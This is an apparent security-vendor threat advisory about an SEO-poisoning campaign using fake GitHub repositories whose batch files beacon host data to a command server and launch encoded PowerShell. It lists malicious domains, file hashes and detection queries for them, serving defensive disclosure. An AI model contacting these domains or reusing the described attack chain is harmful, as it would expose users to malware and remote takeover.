Attack Chain Targets Users Searching for Legitimate Tools

    Wednesday, January 28, 2026 In: Threat Research Print

    Date: 01/28/2026

    Severity: High

    Summary

    We uncovered an attack chain that uses SEO poisoning to lure users searching for legitimate software. Threat actors abuse GitHub by hosting malicious ZIP files in fake repositories. These archives impersonate real applications and include a harmful batch (.bat) file. When executed, the .bat file sends host information to a C2 server using cURL and runs an encoded PowerShell script for reconnaissance. In at least one case, the C2 server delivered a TeamViewer binary to enable remote access.

    Indicators of Compromise (IOC) List

    Domains\URLs:

    2tnl.digital

    ankaraotogaleri.com

    antipolitical.com

    base22.digital

    bestebettingsider.com

    brandingsolutions.com

    globalcharts.com

    rasprod.com

    systemsheuristics.com

    Hash : 

    5e784d9dcdf69fd3bc0d59f94e1fbdc05f83fc5d7ba44e6be51ec3e4d3d0ac38

    32999b06c7bb172bbbba46018caad8cdfe6ccd3c84eee08232ff7944680caa37

    27f3bd706e1a348f17b2b652f889bf576e5ccd31d3742a9b560f01b7f7d0f022

    7d955361c3d264097ee0622b42d40671a8c63098f59986e4c89f4aaec236f638

    717f41263c630b22264936f8737db51169d9947231390a9c1fbf931642ac36af

    cdd0250c6894180d6c3462d2e01fd82ade61a0e2660baac886c5d96460fc4507

    18f708032d184fafd9bbbe21863e07081b2a3cab5c130c953281bb67d4e48ff0

    23d260b2709be0a4d8acff4eafabc8f90b66553e2a4c72aa368260cefb8a7772

    3a978ffb4931a9441c963c011e4b2b434e860b8d492740acf376b683dcbf314a

    3e86e50cd29c266813f1167448be817acfee1c7416062d5836f094bedf1d56eb

    555a54ab1a29d069bd0138731849d0ae55cdd67a8733de6fb9f5de0a3feefbfc

    5bd813331102e380851b9549cb85e00a6a1ffc0bfa3d7a6aa292a339693bf668

    9513fd19cff090402ccf0f776ed140a9dfa4a296a75480d2130e9420ac2165a0

    d003f07424b89f05b508e589ea077a074933029d8162e4f3cf97567a1e99b497

    ee403407691a1630baad10b91acde2d5040b7173dd967cc456d60382ee9723a3

    fe4301d5a21c1fc81ad56c4b7806c54c9a7d82221b6566562df2b4bfbad27462

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1 :

    domainname like "antipolitical.com" or url like "antipolitical.com" or siteurl like "antipolitical.com" or domainname like "2tnl.digital" or url like "2tnl.digital" or siteurl like "2tnl.digital" or domainname like "ankaraotogaleri.com" or url like "ankaraotogaleri.com" or siteurl like "ankaraotogaleri.com" or domainname like "base22.digital" or url like "base22.digital" or siteurl like "base22.digital" or domainname like "bestebettingsider.com" or url like "bestebettingsider.com" or siteurl like "bestebettingsider.com" or domainname like "brandingsolutions.com" or url like "brandingsolutions.com" or siteurl like "brandingsolutions.com" or domainname like "globalcharts.com" or url like "globalcharts.com" or siteurl like "globalcharts.com" or domainname like "rasprod.com" or url like "rasprod.com" or siteurl like "rasprod.com" or domainname like "systemsheuristics.com" or url like "systemsheuristics.com" or siteurl like "systemsheuristics.com"

    Detection Query 2 :

    sha256hash IN ("32999b06c7bb172bbbba46018caad8cdfe6ccd3c84eee08232ff7944680caa37","18f708032d184fafd9bbbe21863e07081b2a3cab5c130c953281bb67d4e48ff0","9513fd19cff090402ccf0f776ed140a9dfa4a296a75480d2130e9420ac2165a0","fe4301d5a21c1fc81ad56c4b7806c54c9a7d82221b6566562df2b4bfbad27462","cdd0250c6894180d6c3462d2e01fd82ade61a0e2660baac886c5d96460fc4507","d003f07424b89f05b508e589ea077a074933029d8162e4f3cf97567a1e99b497","7d955361c3d264097ee0622b42d40671a8c63098f59986e4c89f4aaec236f638","5e784d9dcdf69fd3bc0d59f94e1fbdc05f83fc5d7ba44e6be51ec3e4d3d0ac38","3e86e50cd29c266813f1167448be817acfee1c7416062d5836f094bedf1d56eb","23d260b2709be0a4d8acff4eafabc8f90b66553e2a4c72aa368260cefb8a7772","ee403407691a1630baad10b91acde2d5040b7173dd967cc456d60382ee9723a3","5bd813331102e380851b9549cb85e00a6a1ffc0bfa3d7a6aa292a339693bf668","717f41263c630b22264936f8737db51169d9947231390a9c1fbf931642ac36af","27f3bd706e1a348f17b2b652f889bf576e5ccd31d3742a9b560f01b7f7d0f022","555a54ab1a29d069bd0138731849d0ae55cdd67a8733de6fb9f5de0a3feefbfc","3a978ffb4931a9441c963c011e4b2b434e860b8d492740acf376b683dcbf314a")

    Reference:

    https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-01-22-Attack-chain-targeting-users-looking-for-legitimate-tools.txt


    Tags

    MalwareSEO PoisoningGitHub

    « Previous Article

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2026 by Gurucul - All rights reserved.